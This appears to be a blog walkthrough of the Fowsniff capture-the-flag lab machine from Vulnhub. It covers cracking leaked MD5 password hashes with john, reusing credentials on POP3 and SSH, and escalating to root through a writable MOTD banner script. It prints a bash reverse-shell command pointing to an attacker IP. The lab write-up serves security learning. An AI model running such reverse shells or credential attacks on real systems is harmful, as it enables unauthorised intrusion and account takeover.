Hello, friend. I am back again with another capture-the-flag (ctf) exercise. If you’re new here and curious about ctf exercises, check out my previous post about them here: https://cipherhound.com/blog/enter-the-matrix/. Fowsniff is another vulnerable machine that I downloaded from https://vulnhub.com. It was the first vulnerable machine that I’ve tried that incorporated real world social media into the problem-solving process. Okay, let’s get started.
As usual, I start by monitoring the amount of traffic that I’m sending to the vulnerable machine. Like I said before, I think it’s beneficial to build good habits.
# insert rule iptables -I OUTPUT -p tcp -d fowsniff.local # check traffic iptables -L OUTPUT -nvx
Now, I’ll check to see if this vulnerable machine has a web server that I can connect to so that I can identify and verify headers and options.
We can see in my “headers” notes that the vulnerable machine is using Ubuntu and Apache 2.4.18. That information may be useful later. We can also see that the server accepts that standard requests in the “options” screenshot. Navigating to the web server in my favorite browser, we get more useful information: a message detailing the breach of this fictional corporation. If we search for this twitter handle in a search engine, we find useful information from our hackers. We get a list of the emails used by the corporation and the hashes of their passwords. Furthermore, we get a method to pivot this new information. According to our hackers, the corporation has a POP3 server that’s wide open.
Before moving on to the POP3 server, we should crack these passwords. According to B1gNinj4 the passwords have been hashed with MD5, an insecure hashing algorithm. We can take a list of plaintext words and hash them with the MD5 algorithm to test if they match these known hashes with a dictionary attack.
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt [hashfile]
A POP3 server is an email server that usually allows a client to connect to the server, collect all messages, and delete all messages from the server. It runs on port 110. Using the previous information, I can verify that the vulnerable machine has a POP3 server that is open and use the exposed credentials to authenticate myself to it. Most of the exposed credentials are not useful. There is one; however, that will give you access to very useful emails. I switched to an email client as to better view the emails.
After reading the emails, we can get more information. Now we know that a SSH server is running on the vulnerable machine, we have the password for that account, and we have usernames with which to test it. Just like the credentials for the POP3 server, only one credential is valid for the SSH server.
In order to exploit the information we have discovered, we need to determine which user account (if any) can still be used with the password given in the emails. We can do this with a brute force script or test each one manually.
Now that we have access to an unprivileged account on the target machine, we should identify files that would allow us to change our status. On Linux, we can do this by searching for the SETUID flag on files that we can manipulate with our current status. I don’t really have any luck finding files that would change my status with a SETUID flag; however, I do find a file that is writable by my current group in the /opt directory.
/bin/bash -i >& /dev/tcp/10.11.1.4/80 0>&1
Opening this file, I noticed that it is actually the banner displayed when logging into the target machine via SSH. Now I know that if I am able to insert a reverse shell into this banner file, I will escalate my privileges to root because the SSH server runs as the root user. You can see my first attempt at a reverse shell above. I attempted to redirect an interactive bash shell via a TCP connection to my attacker machine. After researching which file displayed the banner when logging into a server via SSH, I discovered the /etc/update-motd.d/ directory and the 00-header file. I discovered why my first attempt at a reverse shell wasn’t effective. I couldn’t change how the banner file was being called.
I still needed a way to insert a reverse shell into this file. I did some research and discovered that python was installed on the target machine. Using python, I could create the reverse shell that I needed and escalate my privileges.
After getting a root shell on the target machine, I was able to read the flag in the root directory.
Thanks to berzerk0 for supplying this vulnerable machine on Vulnhub!